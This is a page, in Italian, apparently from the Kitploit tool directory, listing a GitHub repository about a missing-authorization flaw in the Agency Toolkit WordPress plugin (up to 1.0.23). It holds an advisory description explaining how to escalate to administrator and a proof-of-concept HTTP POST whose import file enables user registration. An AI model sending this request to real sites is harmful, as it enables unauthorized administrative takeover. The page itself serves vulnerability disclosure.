Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
agency-toolkit-1023-missing-authorization-to-unauthenticated-arbitrary-options-update — Agency Toolkit <= 1.0.23 - Missing Authorization to Unauthenticated Arbitrary Options Update | Kitploit
Strumenti/GitHubGitHub/randomrobbiebf/agency-toolkit-1023-missing-authorization-to-unauthenticated-arbitrary-options-update
Authentication & AuthorizationPrivilege EscalationWeb Application Exploitation
GitHubrandomrobbiebf/agency-toolkit-1023-missing-authorization-to-unauthenticated-arbitrary-options-update

agency-toolkit-1023-missing-authorization-to-unauthenticated-arbitrary-options-update

Agency Toolkit <= 1.0.23 - Missing Authorization to Unauthenticated Arbitrary Options Update

Vedi Repository

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
1 anno faNon ancora revisionato

NoCVE

Agency Toolkit <= 1.0.23 - Autorizzazione mancante per aggiornamento arbitrario delle opzioni senza autenticazione

Descrizione

Il plugin Agency Toolkit per WordPress è vulnerabile alla modifica non autorizzata dei dati che può portare a un'escalation dei privilegi a causa della mancanza di un controllo delle capacità nell'azione 'agency_toolkit_import' in tutte le versioni fino alla 1.0.23 inclusa. Ciò consente ad attaccanti non autenticati di aggiornare opzioni arbitrarie sul sito WordPress. Questo può essere sfruttato per impostare il ruolo predefinito per la registrazione come amministratore e abilitare la registrazione degli utenti, consentendo agli attaccanti di ottenere accesso amministrativo a un sito vulnerabile.

Dettagli

  • Tipo: plugin
  • Slug: agency-toolkit
  • Versione interessata: <= 1.0.23
  • Punteggio CVSS: 9.8
  • Valutazione CVSS: Critico
  • Vettore CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • CVE: N/A
  • Stato: Attivo

POC

root@kitploit:~
POST /wp-admin/admin.php HTTP/2
Host: wp-dev.ddev.site
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryABC123
Content-Length: 485

------WebKitFormBoundaryABC123
Content-Disposition: form-data; name="agency_toolkit_import"

1
------WebKitFormBoundaryABC123
Content-Disposition: form-data; name="import_file"; filename="settings.json"
Content-Type: application/json

[
   
    {
        "option_name": "users_can_register",
        "option_value": "1"
    }
]
------WebKitFormBoundaryABC123--
Scarica lo strumento